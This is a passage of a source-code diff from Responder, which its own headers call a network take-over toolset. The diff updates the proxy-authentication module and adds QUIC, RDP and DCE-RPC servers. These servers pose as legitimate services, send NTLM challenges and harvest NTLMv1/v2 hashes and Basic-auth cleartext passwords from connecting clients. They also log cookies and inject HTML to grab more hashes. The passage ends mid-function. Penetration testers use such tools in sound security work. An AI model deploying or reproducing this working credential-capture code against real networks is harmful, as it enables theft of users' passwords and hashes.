+		except Exception as e:
+			if settings.Config.Verbose:
+				print(text('[POP3] Exception: %s' % str(e)))
 			pass

servers/Proxy_Auth.py

@@ -14,10 +14,18 @@
 #
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
-import SocketServer
-from HTTP import ParseHTTPHash
-from packets import *
 from utils import *
+if settings.Config.PY2OR3 == "PY3":
+	from socketserver import BaseRequestHandler, StreamRequestHandler
+else:
+	from SocketServer import BaseRequestHandler, StreamRequestHandler
+from servers.HTTP import ParseHTTPHash
+from packets import *
+
+def GrabUserAgent(data):
+	UserAgent = re.findall(r'(?<=User-Agent: )[^\r]*', data)
+	if UserAgent:
+		print(text("[Proxy-Auth] %s" % color("User-Agent        : "+UserAgent[0], 2)))
 
 def GrabCookie(data):
 	Cookie = re.search(r'(Cookie:*.\=*)[^\r\n]*', data)
@@ -25,8 +33,8 @@ def GrabCookie(data):
 	if Cookie:
 		Cookie = Cookie.group(0).replace('Cookie: ', '')
 		if len(Cookie) > 1:
-                        if settings.Config.Verbose:
-			        print text("[Proxy-Auth] %s" % color("Cookie           : "+Cookie, 2))
+			if settings.Config.Verbose:
+				print(text("[Proxy-Auth] %s" % color("Cookie           : "+Cookie, 2)))
 
 		return Cookie
 	return False
@@ -36,45 +44,49 @@ def GrabHost(data):
 
 	if Host:
 		Host = Host.group(0).replace('Host: ', '')
-                if settings.Config.Verbose:
-		        print text("[Proxy-Auth] %s" % color("Host             : "+Host, 2))
+		if settings.Config.Verbose:
+			print(text("[Proxy-Auth] %s" % color("Host             : "+Host, 2)))
 
 		return Host
 	return False
 
-def PacketSequence(data, client):
+def PacketSequence(data, client, Challenge):
 	NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
 	Basic_Auth = re.findall(r'(?<=Authorization: Basic )[^\r]*', data)	
 	if NTLM_Auth:
 		Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]
-		if Packet_NTLM == "\x01":
+		if Packet_NTLM == b'\x01':
 			if settings.Config.Verbose:
-				print text("[Proxy-Auth] Sending NTLM authentication request to %s" % client)
-
-			Buffer = NTLM_Challenge(ServerChallenge=settings.Config.Challenge)
+				print(text("[Proxy-Auth] Sending NTLM authentication request to %s" % client.replace("::ffff:","")))
+			Buffer = NTLM_Challenge(ServerChallenge=NetworkRecvBufferPython2or3(Challenge))
 			Buffer.calculate()
-			Buffer_Ans = WPAD_NTLM_Challenge_Ans()
-			Buffer_Ans.calculate(str(Buffer))
-			return str(Buffer_Ans)
-		if Packet_NTLM == "\x03":
+			Buffer_Ans =  WPAD_NTLM_Challenge_Ans(Payload = b64encode(NetworkSendBufferPython2or3(Buffer)).decode('latin-1'))
+			return Buffer_Ans
+
+		if Packet_NTLM == b'\x03':
 			NTLM_Auth = b64decode(''.join(NTLM_Auth))
-       	                ParseHTTPHash(NTLM_Auth, client, "Proxy-Auth")
-                        GrabCookie(data)
-                        GrabHost(data)
-   	                return False
+			ParseHTTPHash(NTLM_Auth, Challenge, client, "Proxy-Auth")
+			GrabUserAgent(data)
+			GrabCookie(data)
+			GrabHost(data)
+			#Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject) #While at it, grab some SMB hashes...
+			#Buffer.calculate()
+			#Return a TCP RST, so the client uses direct connection and avoids disruption.
+			return RST
 		else:
-               		return False
+               		return IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)# Didn't work? no worry, let's grab hashes via SMB...
 
 	elif Basic_Auth:
-                GrabCookie(data)
-                GrabHost(data)
-		ClearText_Auth = b64decode(''.join(Basic_Auth))
+		GrabUserAgent(data)
+		GrabCookie(data)
+		GrabHost(data)
+		ClearText_Auth = b64decode(''.join(Basic_Auth).encode('latin-1'))
 		SaveToDb({
 			'module': 'Proxy-Auth', 
 			'type': 'Basic', 
 			'client': client, 
-			'user': ClearText_Auth.split(':')[0], 
-			'cleartext': ClearText_Auth.split(':')[1], 
+			'user': ClearText_Auth.decode('latin-1').split(':')[0], 
+			'cleartext': ClearText_Auth.decode('latin-1').split(':')[1], 
 			})
 
 		return False
@@ -82,27 +94,51 @@ def PacketSequence(data, client):
 		if settings.Config.Basic:
 			Response = WPAD_Basic_407_Ans()
 			if settings.Config.Verbose:
-				print text("[Proxy-Auth] Sending BASIC authentication request to %s" % client)
+				print(text("[Proxy-Auth] Sending BASIC authentication request to %s" % client.replace("::ffff:","")))
 
 		else:
 			Response = WPAD_Auth_407_Ans()
 
 		return str(Response)
 
-class Proxy_Auth(SocketServer.BaseRequestHandler):
-     
-    def server_bind(self):
-       self.socket.setsockopt(SOL_SOCKET, SO_REUSEADDR,SO_REUSEPORT, 1)
-       self.socket.bind(self.server_address)
-       self.socket.setblocking(0)
-       self.socket.setdefaulttimeout(1)
+class Proxy_Auth(BaseRequestHandler):
 
-    def handle(self):
+	def handle(self):
 		try:
-                    for x in range(2):
-                        data = self.request.recv(4096)
-                        self.request.send(PacketSequence(data, self.client_address[0]))
+			Challenge = RandomChallenge()
+			while True:
+				self.request.settimeout(3)
+				remaining = 10*1024*1024 #setting max recieve size
+				data = ''
+				while True:
+					buff = ''
+					buff = NetworkRecvBufferPython2or3(self.request.recv(8092))
+					if buff == '':
+						break
+					data += buff
+					remaining -= len(buff)
+					#check if we recieved the full header
+					if data.find('\r\n\r\n') != -1: 
+						#we did, now to check if there was anything else in the request besides the header
+						if data.find('Content-Length') == -1:
+							#request contains only header
+							break
+						else:
+							#searching for that content-length field in the header
+							for line in data.split('\r\n'):
+								if line.find('Content-Length') != -1:
+									line = line.strip()
+									remaining = int(line.split(':')[1].strip()) - len(data)
+					if remaining <= 0:
+						break
+				if data == "":
+					break
+
+				else:
+					Buffer = PacketSequence(data,self.client_address[0], Challenge)
+					self.request.send(NetworkSendBufferPython2or3(Buffer))
 
 		except:
-                   	pass
+			pass
+
 

servers/QUIC.py

@@ -0,0 +1,168 @@
+import asyncio
+import logging
+import ssl
+import argparse
+import netifaces
+from utils import *
+from aioquic.asyncio import serve
+from aioquic.asyncio.protocol import QuicConnectionProtocol
+from aioquic.quic.configuration import QuicConfiguration
+from aioquic.quic.events import QuicEvent, StreamDataReceived, StreamReset, ConnectionTerminated
+
+BUFFER_SIZE = 11000
+
+def get_interface_ip(interface_name):
+    """Get the IP address of a network interface."""
+    try:
+        # Get address info for the specified interface
+        addresses = netifaces.ifaddresses(interface_name)
+        
+        # Get IPv4 address (AF_INET = IPv4)
+        if netifaces.AF_INET in addresses:
+            return addresses[netifaces.AF_INET][0]['addr']
+        
+        # If no IPv4 address, try IPv6 (AF_INET6 = IPv6)
+        if netifaces.AF_INET6 in addresses:
+            return addresses[netifaces.AF_INET6][0]['addr']
+        
+        logging.error(f"[!] No IP address found for interface {interface_name}")
+        return None
+    except ValueError:
+        logging.error(f"[!] Interface {interface_name} not found")
+        return None
+
+
+class QUIC(QuicConnectionProtocol):
+    def __init__(self, *args, target_address=None, **kwargs):
+        super().__init__(*args, **kwargs)
+        self.tcp_connections = {}  # stream_id -> (reader, writer)
+        self.target_address = target_address or "localhost"
+        
+    def quic_event_received(self, event):
+        if isinstance(event, StreamDataReceived):
+            asyncio.create_task(self.handle_stream_data(event.stream_id, event.data))
+        elif isinstance(event, StreamReset) or isinstance(event, ConnectionTerminated):
+            # Only try to close connections if we have any
+            if self.tcp_connections:
+                asyncio.create_task(self.close_all_tcp_connections())
+                
+    async def handle_stream_data(self, stream_id, data):
+        if stream_id not in self.tcp_connections:
+            # Create a new TCP connection to the target interface:445
+            try:
+                reader, writer = await asyncio.open_connection(self.target_address, 445)
+                self.tcp_connections[stream_id] = (reader, writer)
+                
+                # Start task to read from TCP and write to QUIC
+                asyncio.create_task(self.tcp_to_quic(stream_id, reader))
+                
+                logging.info(f"[*] Connected to {self.target_address}:445\n[*] Starting relaying process...")
+                print(text("[QUIC] Forwarding QUIC connection to SMB server"))
+            except Exception as e:
+                logging.error(f"[!] Error connecting to {self.target_address}:445: {e}")
+                return
+        
+        # Forward data from QUIC to TCP
+        try:
+            _, writer = self.tcp_connections[stream_id]
+            writer.write(data)
+            await writer.drain()
+        except Exception as e:
+            logging.error(f"[!] Error writing to TCP: {e}")
+            await self.close_tcp_connection(stream_id)
+    
+    async def tcp_to_quic(self, stream_id, reader):
+        try:
+            while True:
+                data = await reader.read(BUFFER_SIZE)
+                if not data:
+                    break
+                
+                self._quic.send_stream_data(stream_id, data)
+                self.transmit()
+        except Exception as e:
+            logging.error(f"[!] Error reading from TCP: {e}")
+        finally:
+            await self.close_tcp_connection(stream_id)
+    
+    async def close_tcp_connection(self, stream_id):
+        if stream_id in self.tcp_connections:
+            _, writer = self.tcp_connections[stream_id]
+            writer.close()
+            await writer.wait_closed()
+            del self.tcp_connections[stream_id]
+    
+    async def close_all_tcp_connections(self):
+        try:
+            # Make a copy of the keys to avoid modification during iteration
+            stream_ids = list(self.tcp_connections.keys())
+            for stream_id in stream_ids:
+                try:
+                    await self.close_tcp_connection(stream_id)
+                except KeyError:
+                    # Silently ignore if the stream ID no longer exists
+                    pass
+        except Exception as e:
+            # Catch any other exceptions that might occur
+            logging.debug(f"[!] Error closing TCP connections: {e}")
+
+async def start_quic_server(listen_interface, cert_path, key_path):
+    # Configure QUIC
+    configuration = QuicConfiguration(
+        alpn_protocols=["smb"],
+        is_client=False,
+    )
+    
+    # Load certificate and private key
+    try:
+        configuration.load_cert_chain(cert_path, key_path)
+    except Exception as e:
+        logging.error(f"[!] Could not load {cert_path} and {key_path}: {e}")
+        return
+    
+    # Resolve interfaces to IP addresses
+    listen_ip = listen_interface
+    if not is_ip_address(listen_interface):
+        listen_ip = get_interface_ip(listen_interface)
+        if not listen_ip:
+            logging.error(f"[!] Could not resolve IP address for interface {listen_interface}")
+            return
+    
+    target_ip = listen_interface
+    if not is_ip_address(listen_interface):
+        target_ip = get_interface_ip(listen_interface)
+        if not target_ip:
+            logging.error(f"[!] Could not resolve IP address for interface {listen_interface}")
+            return
+    
+    # Start QUIC server with correct protocol factory
+    server = await serve(
+        host=listen_ip,
+        port=443,
+        configuration=configuration,
+        create_protocol=lambda *args, **kwargs: QUIC(
+            *args,
+            target_address=target_ip,
+            **kwargs
+        )
+    )
+    
+    logging.info(f"[*] Started listening on {listen_ip}:443 (UDP)")
+    logging.info(f"[*] Forwarding connections to {target_ip}:445 (TCP)")
+    
+    # Keep the server running forever
+    await asyncio.Future()
+
+
+def is_ip_address(address):
+    """Check if a string is a valid IP address."""
+    import socket
+    try:
+        socket.inet_pton(socket.AF_INET, address)
+        return True
+    except socket.error:
+        try:
+            socket.inet_pton(socket.AF_INET6, address)
+            return True
+        except socket.error:
+            return False

servers/RDP.py

@@ -0,0 +1,146 @@
+#!/usr/bin/env python
+# This file is part of Responder, a network take-over set of tools 
+# created and maintained by Laurent Gaffie.
+# email: laurent.gaffie@gmail.com
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program.  If not, see <http://www.gnu.org/licenses/>.
+from utils import *
+import struct
+import re
+import ssl
+import codecs
+if settings.Config.PY2OR3 == "PY3":
+	from socketserver import BaseRequestHandler
+else:
+	from SocketServer import BaseRequestHandler
+
+from packets import TPKT, X224, RDPNEGOAnswer, RDPNTLMChallengeAnswer
+
+cert = os.path.join(settings.Config.ResponderPATH, settings.Config.SSLCert)
+key =  os.path.join(settings.Config.ResponderPATH, settings.Config.SSLKey)
+
+def ParseNTLMHash(data,client, Challenge):  #Parse NTLMSSP v1/v2
+	SSPIStart  = data.find(b'NTLMSSP')
+	SSPIString = data[SSPIStart:]
+	LMhashLen    = struct.unpack('<H',data[SSPIStart+14:SSPIStart+16])[0]
+	LMhashOffset = struct.unpack('<H',data[SSPIStart+16:SSPIStart+18])[0]
+	LMHash       = SSPIString[LMhashOffset:LMhashOffset+LMhashLen]
+	LMHash	     = codecs.encode(LMHash, 'hex').upper().decode('latin-1')
+	NthashLen    = struct.unpack('<H',data[SSPIStart+20:SSPIStart+22])[0]
+	NthashOffset = struct.unpack('<H',data[SSPIStart+24:SSPIStart+26])[0]
+
+	if NthashLen == 24:
+		SMBHash      = SSPIString[NthashOffset:NthashOffset+NthashLen]
+		SMBHash      = codecs.encode(SMBHash, 'hex').upper().decode('latin-1')
+		DomainLen    = struct.unpack('<H',SSPIString[30:32])[0]
+		DomainOffset = struct.unpack('<H',SSPIString[32:34])[0]
+		Domain       = SSPIString[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
+		UserLen      = struct.unpack('<H',SSPIString[38:40])[0]
+		UserOffset   = struct.unpack('<H',SSPIString[40:42])[0]
+		Username     = SSPIString[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
+		WriteHash    = '%s::%s:%s:%s:%s' % (Username, Domain, LMHash, SMBHash, codecs.encode(Challenge,'hex').decode('latin-1'))
+
+		SaveToDb({
+			'module': 'RDP', 
+			'type': 'NTLMv1-SSP', 
+			'client': client, 
+			'user': Domain+'\\'+Username, 
+			'hash': SMBHash, 
+			'fullhash': WriteHash,
+		})
+
+	if NthashLen > 60:
+		SMBHash      = SSPIString[NthashOffset:NthashOffset+NthashLen]
+		SMBHash      = codecs.encode(SMBHash, 'hex').upper().decode('latin-1')
+		DomainLen    = struct.unpack('<H',SSPIString[30:32])[0]
+		DomainOffset = struct.unpack('<H',SSPIString[32:34])[0]
+		Domain       = SSPIString[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
+		UserLen      = struct.unpack('<H',SSPIString[38:40])[0]
+		UserOffset   = struct.unpack('<H',SSPIString[40:42])[0]
+		Username     = SSPIString[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
+		WriteHash    = '%s::%s:%s:%s:%s' % (Username, Domain, codecs.encode(Challenge,'hex').decode('latin-1'), SMBHash[:32], SMBHash[32:])
+
+		SaveToDb({
+			'module': 'RDP', 
+			'type': 'NTLMv2-SSP', 
+			'client': client, 
+			'user': Domain+'\\'+Username, 
+			'hash': SMBHash, 
+			'fullhash': WriteHash,
+		})
+
+
+def FindNTLMNegoStep(data):
+	NTLMStart  = data.find(b'NTLMSSP')
+	NTLMString = data[NTLMStart:]
+	NTLMStep = NTLMString[8:12]
+	if NTLMStep == b'\x01\x00\x00\x00':
+		return NTLMStep
+	if NTLMStep == b'\x03\x00\x00\x00':
+		return NTLMStep
+	else:
+		return False
+
+class RDP(BaseRequestHandler):
+	def handle(self):
+		try:
+			data = self.request.recv(1024)
+			self.request.settimeout(30)
+			Challenge = RandomChallenge()
+
+			cert = os.path.join(settings.Config.ResponderPATH, settings.Config.SSLCert)
+			key =  os.path.join(settings.Config.ResponderPATH, settings.Config.SSLKey)
+			context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
+			context.load_cert_chain(cert, key)
+
+			if data[11:12] == b'\x01':
+				x =  X224(Data=RDPNEGOAnswer())
+				x.calculate()
+				h = TPKT(Data=x)
+				h.calculate()
+				buffer1 = str(h)
+				self.request.send(NetworkSendBufferPython2or3(buffer1))
+				SSLsock = context.wrap_socket(self.request, server_side=True)
+				SSLsock.settimeout(30)
+				data = SSLsock.read(8092)
+				if FindNTLMNegoStep(data) == b'\x01\x00\x00\x00':
+					x = RDPNTLMChallengeAnswer(NTLMSSPNtServerChallenge=NetworkRecvBufferPython2or3(Challenge))
+					x.calculate()
+					SSLsock.write(NetworkSendBufferPython2or3(x))
+					data = SSLsock.read(8092)
+					if FindNTLMNegoStep(data) == b'\x03\x00\x00\x00':
+						ParseNTLMHash(data,self.client_address[0], Challenge)
+
+			##Sometimes a client sends a routing cookie; we don't want to miss that let's look at it the other way around..
+			if data[len(data)-4:] == b'\x03\x00\x00\x00':
+				x =  X224(Data=RDPNEGOAnswer())
+				x.calculate()
+				h = TPKT(Data=x)
+				h.calculate()
+				buffer1 = str(h)
+				self.request.send(NetworkSendBufferPython2or3(buffer1))
+				data = self.request.recv(8092)
+				SSLsock = context.wrap_socket(self.request, server_side=True)
+				data = SSLsock.read(8092)
+				if FindNTLMNegoStep(data) == b'\x01\x00\x00\x00':
+					x = RDPNTLMChallengeAnswer(NTLMSSPNtServerChallenge=NetworkRecvBufferPython2or3(Challenge))
+					x.calculate()
+					SSLsock.write(NetworkSendBufferPython2or3(x))
+					data = SSLsock.read(8092)
+					if FindNTLMNegoStep(data) == b'\x03\x00\x00\x00':
+						ParseNTLMHash(data,self.client_address[0], Challenge)
+
+			else:
+				return False
+		except:
+			pass

servers/RPC.py

@@ -0,0 +1,401 @@
+#!/usr/bin/env python
+# This file is part of Responder, a network take-over set of tools 
+# created and maintained by Laurent Gaffie.
+# email: lgaffie@secorizon.com
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program.  If not, see <http://www.gnu.org/licenses/>.
+from utils import *
+import struct
+import re
+import ssl
+import codecs
+
+if settings.Config.PY2OR3 == "PY3":
+	from socketserver import BaseRequestHandler
+else:
+	from SocketServer import BaseRequestHandler
+
+from packets import RPCMapBindAckAcceptedAns, RPCMapBindMapperAns, RPCHeader, NTLMChallenge, RPCNTLMNego
+
+# Transfer syntaxes
+NDR = "\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60" # NDR v2
+Map = "\x33\x05\x71\x71\xba\xbe\x37\x49\x83\x19\xb5\xdb\xef\x9c\xcc\x36" # v1
+MapBind = "\x08\x83\xaf\xe1\x1f\x5d\xc9\x11\x91\xa4\x08\x00\x2b\x14\xa0\xfa"
+
+# Common RPC interface UUIDs (original ones)
+DSRUAPI  = "\x35\x42\x51\xe3\x06\x4b\xd1\x11\xab\x04\x00\xc0\x4f\xc2\xdc\xd2"  # v4
+LSARPC   = "\x78\x57\x34\x12\x34\x12\xcd\xab\xef\x00\x01\x23\x45\x67\x89\xab" # v0
+NETLOGON = "\x78\x56\x34\x12\x34\x12\xcd\xab\xef\x00\x01\x23\x45\x67\xcf\xfb" # v1
+WINSPOOL = "\x96\x3f\xf0\x76\xfd\xcd\xfc\x44\xa2\x2c\x64\x95\x0a\x00\x12\x09" # v1
+
+# Additional RPC interfaces for better coverage
+SAMR     = "\x78\x57\x34\x12\x34\x12\xcd\xab\xef\x00\x01\x23\x45\x67\x89\xac" # v1 - Security Account Manager
+SRVSVC   = "\xc8\x4f\x32\x4b\x70\x16\xd3\x01\x12\x78\x5a\x47\xbf\x6e\xe1\x88" # v3 - Server Service
+WKSSVC   = "\x98\xd0\xff\x6b\x12\xa1\x10\x36\x98\x33\x46\xc3\xf8\x7e\x34\x5a" # v1 - Workstation Service
+WINREG   = "\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03" # v1 - Windows Registry
+SVCCTL   = "\x81\xbb\x7a\x36\x44\x98\xf1\x35\xad\x32\x98\xf0\x38\x00\x10\x03" # v2 - Service Control Manager
+ATSVC    = "\x82\x06\xf7\x1f\x51\x0a\xe8\x30\x07\x6d\x74\x0b\xe8\xce\xe9\x8b" # v1 - Task Scheduler
+DNSSERVER= "\xa4\xc2\xab\x50\x4d\x57\xb3\x40\x9d\x66\xee\x4f\xd5\xfb\xa0\x76" # v5 - DNS Server
+
+# Interface names for logging
+INTERFACE_NAMES = {
+	DSRUAPI: "DRSUAPI",
+	LSARPC: "LSARPC",
+	NETLOGON: "NETLOGON",
+	WINSPOOL: "WINSPOOL",
+	SAMR: "SAMR",
+	SRVSVC: "SRVSVC",
+	WKSSVC: "WKSSVC",
+	WINREG: "WINREG",
+	SVCCTL: "SVCCTL",
+	ATSVC: "ATSVC",
+	DNSSERVER: "DNSSERVER"
+}
+
+def FindNTLMOpcode(data):
+	"""Find NTLMSSP message type in data"""
+	SSPIStart = data.find(b'NTLMSSP')
+	if SSPIStart == -1:
+		return False
+	SSPIString = data[SSPIStart:]
+	if len(SSPIString) < 12:
+		return False
+	return SSPIString[8:12]
+
+def ParseRPCHash(data, client, Challenge):
+	"""Parse NTLMSSP v1/v2 hashes from RPC data"""
+	SSPIStart = data.find(b'NTLMSSP')
+	if SSPIStart == -1:
+		return
+	
+	SSPIString = data[SSPIStart:]
+	if len(SSPIString) < 64:
+		return
+	
+	try:
+		LMhashLen    = struct.unpack('<H', data[SSPIStart+14:SSPIStart+16])[0]
+		LMhashOffset = struct.unpack('<H', data[SSPIStart+16:SSPIStart+18])[0]
+		LMHash       = SSPIString[LMhashOffset:LMhashOffset+LMhashLen]
+		LMHash       = codecs.encode(LMHash, 'hex').upper().decode('latin-1')
+		
+		NthashLen    = struct.unpack('<H', data[SSPIStart+20:SSPIStart+22])[0]
+		NthashOffset = struct.unpack('<H', data[SSPIStart+24:SSPIStart+26])[0]
+		
+		# NTLMv1
+		if NthashLen == 24:
+			SMBHash      = SSPIString[NthashOffset:NthashOffset+NthashLen]
+			SMBHash      = codecs.encode(SMBHash, 'hex').upper().decode('latin-1')
+			DomainLen    = struct.unpack('<H', SSPIString[30:32])[0]
+			DomainOffset = struct.unpack('<H', SSPIString[32:34])[0]
+			Domain       = SSPIString[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
+			UserLen      = struct.unpack('<H', SSPIString[38:40])[0]
+			UserOffset   = struct.unpack('<H', SSPIString[40:42])[0]
+			Username     = SSPIString[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
+			
+			# Try to get hostname
+			HostnameLen    = struct.unpack('<H', SSPIString[46:48])[0]
+			HostnameOffset = struct.unpack('<H', SSPIString[48:50])[0]
+			if HostnameLen > 0 and HostnameOffset + HostnameLen <= len(SSPIString):
+				Hostname = SSPIString[HostnameOffset:HostnameOffset+HostnameLen].decode('UTF-16LE', errors='ignore')
+			else:
+				Hostname = ''
+			
+			WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, LMHash, SMBHash, codecs.encode(Challenge, 'hex').decode('latin-1'))
+			
+			SaveToDb({
+				'module': 'DCE-RPC',
+				'type': 'NTLMv1-SSP',
+				'client': client,
+				'hostname': Hostname,
+				'user': Domain+'\\'+Username,
+				'hash': SMBHash,
+				'fullhash': WriteHash,
+			})
+		
+		# NTLMv2
+		elif NthashLen > 60:
+			SMBHash      = SSPIString[NthashOffset:NthashOffset+NthashLen]
+			SMBHash      = codecs.encode(SMBHash, 'hex').upper().decode('latin-1')
+			DomainLen    = struct.unpack('<H', SSPIString[30:32])[0]
+			DomainOffset = struct.unpack('<H', SSPIString[32:34])[0]
+			Domain       = SSPIString[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
+			UserLen      = struct.unpack('<H', SSPIString[38:40])[0]
+			UserOffset   = struct.unpack('<H', SSPIString[40:42])[0]
+			Username     = SSPIString[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
+			
+			# Try to get hostname
+			HostnameLen    = struct.unpack('<H', SSPIString[46:48])[0]
+			HostnameOffset = struct.unpack('<H', SSPIString[48:50])[0]
+			if HostnameLen > 0 and HostnameOffset + HostnameLen <= len(SSPIString):
+				Hostname = SSPIString[HostnameOffset:HostnameOffset+HostnameLen].decode('UTF-16LE', errors='ignore')
+			else:
+				Hostname = ''
+			
+			WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, codecs.encode(Challenge, 'hex').decode('latin-1'), SMBHash[:32], SMBHash[32:])
+			
+			SaveToDb({
+				'module': 'DCE-RPC',
+				'type': 'NTLMv2-SSP',
+				'client': client,
+				'hostname': Hostname,
+				'user': Domain+'\\'+Username,
+				'hash': SMBHash,
+				'fullhash': WriteHash,
+			})
+	except Exception as e:
+		if settings.Config.Verbose:
+			print(text('[DCE-RPC] Error parsing hash: %s' % str(e)))
+
+def FindInterfaceUUID(data):
+	"""Find which RPC interface UUID is being requested"""
+	# Check for each known interface UUID in the data
+	for uuid, name in INTERFACE_NAMES.items():
+		if NetworkSendBufferPython2or3(uuid) in data:
+			return uuid, name
+	return None, None
+
+class RPCMap(BaseRequestHandler):
+	"""RPCMap handler - Port 135 Endpoint Mapper"""
+	
+	def handle(self):
+		try:
+			data = self.request.recv(2048)
+			if not data:
+				return
+			
+			self.request.settimeout(5)
+			Challenge = RandomChallenge()
+			
+			# Handle BIND request
+			if data[0:3] == b"\x05\x00\x0b":  # Bind Request
+				# Identify which interface first
+				uuid, interface_name = FindInterfaceUUID(data)
+				if not interface_name:
+					interface_name = "unknown interface"
+				
+				# Check for NTLMSSP NEGOTIATE in BIND
+				if FindNTLMOpcode(data) == b"\x01\x00\x00\x00":
+					# Send NTLMSSP CHALLENGE
+					n = NTLMChallenge(NTLMSSPNtServerChallenge=NetworkRecvBufferPython2or3(Challenge))
+					n.calculate()
+					RPC = RPCNTLMNego(Data=n)
+					RPC.calculate()
+					self.request.send(NetworkSendBufferPython2or3(str(RPC)))
+					
+					# Receive NTLMSSP AUTH
+					data = self.request.recv(2048)
+					if FindNTLMOpcode(data) == b"\x03\x00\x00\x00":
+						ParseRPCHash(data, self.client_address[0], Challenge)
+						print(color("[*] [DCE-RPC] NTLM authentication on %s from %s" % (interface_name, self.client_address[0].replace("::ffff:", "")), 3, 1))
+						self.request.close()
+						return
+				
+				# Standard BIND processing
+				if NetworkSendBufferPython2or3(Map) in data:
+					RPC = RPCMapBindAckAcceptedAns(CTX1UID=Map, CTX1UIDVersion="\x01\x00\x00\x00", CallID=NetworkRecvBufferPython2or3(data[12:16]))
+				elif NetworkSendBufferPython2or3(NDR) in data and NetworkSendBufferPython2or3(Map) not in data:
+					RPC = RPCMapBindAckAcceptedAns(CTX1UID=NDR, CTX1UIDVersion="\x02\x00\x00\x00", CallID=NetworkRecvBufferPython2or3(data[12:16]))
+				else:
+					# Try to identify which interface
+					if uuid:
+						RPC = RPCMapBindAckAcceptedAns(CTX1UID=uuid, CTX1UIDVersion="\x01\x00\x00\x00", CallID=NetworkRecvBufferPython2or3(data[12:16]))
+						if settings.Config.Verbose:
+							print(text('[DCE-RPC] BIND request for %s from %s' % (interface_name, self.client_address[0].replace("::ffff:", ""))))
+					else:
+						# Default to NDR
+						RPC = RPCMapBindAckAcceptedAns(CTX1UID=NDR, CTX1UIDVersion="\x02\x00\x00\x00", CallID=NetworkRecvBufferPython2or3(data[12:16]))
+				
+				RPC.calculate()
+				self.request.send(NetworkSendBufferPython2or3(str(RPC)))
+				
+				# Try to receive more data (AUTH3 or REQUEST)
+				try:
+					data = self.request.recv(2048)
+					if data:
+						# Check for AUTH3 (packet type 0x10)
+						if len(data) > 2 and data[2:3] == b"\x10":
+							if FindNTLMOpcode(data) == b"\x03\x00\x00\x00":
+								ParseRPCHash(data, self.client_address[0], Challenge)
+								print(color("[*] [DCE-RPC] NTLM authentication on %s from %s" % (interface_name, self.client_address[0].replace("::ffff:", "")), 3, 1))
+						# Check for NTLM in any subsequent packet
+						elif FindNTLMOpcode(data) == b"\x03\x00\x00\x00":
+							ParseRPCHash(data, self.client_address[0], Challenge)
+							print(color("[*] [DCE-RPC] NTLM authentication on %s from %s" % (interface_name, self.client_address[0].replace("::ffff:", "")), 3, 1))
+				except:
+					pass
+			
+			# Handle mapper requests (after BIND)
+			elif data[0:3] == b"\x05\x00\x00":  # Mapper request
+				uuid, name = FindInterfaceUUID(data)
+				
+				if uuid == DSRUAPI:
+					x = RPCMapBindMapperAns()
+					x.calculate()
+					RPC = RPCHeader(Data=x, CallID=NetworkRecvBufferPython2or3(data[12:16]))
+					RPC.calculate()
+					self.request.send(NetworkSendBufferPython2or3(str(RPC)))
+					print(color("[*] [DCE-RPC Mapper] Redirected %-15s to DRSUAPI auth server." % self.client_address[0].replace("::ffff:", ""), 3, 1))
+				
+				elif uuid == LSARPC:
+					x = RPCMapBindMapperAns(Tower1UID=LSARPC, Tower1Version="\x00\x00", Tower2UID=NDR, Tower2Version="\x02\x00")
+					x.calculate()
+					RPC = RPCHeader(Data=x, CallID=NetworkRecvBufferPython2or3(data[12:16]))
+					RPC.calculate()
+					self.request.send(NetworkSendBufferPython2or3(str(RPC)))
+					print(color("[*] [DCE-RPC Mapper] Redirected %-15s to LSARPC auth server." % self.client_address[0].replace("::ffff:", ""), 3, 1))
+				
+				elif uuid == SAMR:
+					x = RPCMapBindMapperAns(Tower1UID=SAMR, Tower1Version="\x01\x00", Tower2UID=NDR, Tower2Version="\x02\x00")
+					x.calculate()
+					RPC = RPCHeader(Data=x, CallID=NetworkRecvBufferPython2or3(data[12:16]))
+					RPC.calculate()
+					self.request.send(NetworkSendBufferPython2or3(str(RPC)))
+					print(color("[*] [DCE-RPC Mapper] Redirected %-15s to SAMR auth server." % self.client_address[0].replace("::ffff:", ""), 3, 1))
+				
+				elif uuid == SRVSVC:
+					x = RPCMapBindMapperAns(Tower1UID=SRVSVC, Tower1Version="\x03\x00", Tower2UID=NDR, Tower2Version="\x02\x00")
+					x.calculate()
+					RPC = RPCHeader(Data=x, CallID=NetworkRecvBufferPython2or3(data[12:16]))
+					RPC.calculate()
+					self.request.send(NetworkSendBufferPython2or3(str(RPC)))
+					print(color("[*] [DCE-RPC Mapper] Redirected %-15s to SRVSVC auth server." % self.client_address[0].replace("::ffff:", ""), 3, 1))
+				
+				elif uuid == WKSSVC:
